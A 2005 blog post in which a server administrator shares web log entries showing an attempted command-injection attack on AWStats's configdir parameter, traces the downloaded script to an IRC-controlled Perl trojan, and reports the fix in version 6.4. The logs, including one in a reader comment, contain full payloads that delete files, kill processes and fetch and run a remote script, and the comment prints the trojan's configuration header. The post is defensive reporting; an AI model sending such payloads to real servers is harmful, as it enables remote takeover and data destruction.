Friday, July 8, 2005

potential security hole in awstats [updated]


I noticed the following entries in my log file:


66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


It appears that this person is attempting to have awstats download a perl script and have it executed on the web server.  When I looked at the script that it is attempting to download, it attempts to connect to an irc server and sends information there. (ClamAV identifies this script as "Trojan.Perl.Shellbot.C")




I sent emails to the administrations of the various involved networks to have them stop this activity.  Also, since I am assuming that the script writer is attempting to exploit a hole, that there is, or was, one in awstats.  I have left a message on the Awstats developer forum, so they can look into this potential problem.


Update:  This was fixed in the 6.4 version of awstats.  If you are running an earlier version, you should update your awstats install.


Technorati Tags: ,

By -
Labels:

1 comment:

  1. johnNovember 17, 2005 at 12:07 AM

    This is part of the log
    219.166.34.48 - - [16/Nov/2005:02:12:35 +0100] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/mkaomike/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    This a.txt file has the header
    #!/usr/bin/perl
    #
    # ShellBOT - FBI TEAM Corporation
    #
    # 0ldW0lf - effbeeye81@aol.com
    # - www.security.cnc.net
    #
    #
    #
    ################ CONFIGURACAO #################################################################
    my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
    #----------------------------------------------################################################
    my $linas_max='8'; # Evita o flood :) depois de X linhas #
    #----------------------------------------------################################################
    my $sleep='4'; # ele dorme X segundos #
    ##################### IRC #####################################################################
    my @adms=("the-brain","adilcm","alalah"); # Nick do administrador
    #
    #----------------------------------------------################################################
    my @canais=("#kit *"); # Caso haja senha ("#canal :senha") #
    #----------------------------------------------################################################
    my $nick='`alah'; # Nick do bot. Caso esteja em uso vai aparecer #
    # aparecer com numero radonamico no final #
    #----------------------------------------------################################################
    my $ircname = 'super'; # User ID
    #
    #----------------------------------------------################################################
    chop (my $realname = `uname -a`); # Full Name #
    #----------------------------------------------################################################
    $servidor='213.150.48.155' unless $servidor; # Servidor de irc que vai ser usado #
    # caso não seja especificado no argumento #
    #----------------------------------------------################################################
    my $porta='6667'; # Porta do servidor de irc #
    ################ ACESSO A SHELL ###############################################################
    my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
    ###############################################################################################

    ReplyDelete

Subscribe to: Post Comments (Atom)

Unlocking Raspberry Pi Potential: Navigating Network Booting Challenges for Enhanced Performance and Reliability

I've set up several Raspberry Pis around our house for various projects, but one recurring challenge is the potential for SD card failur...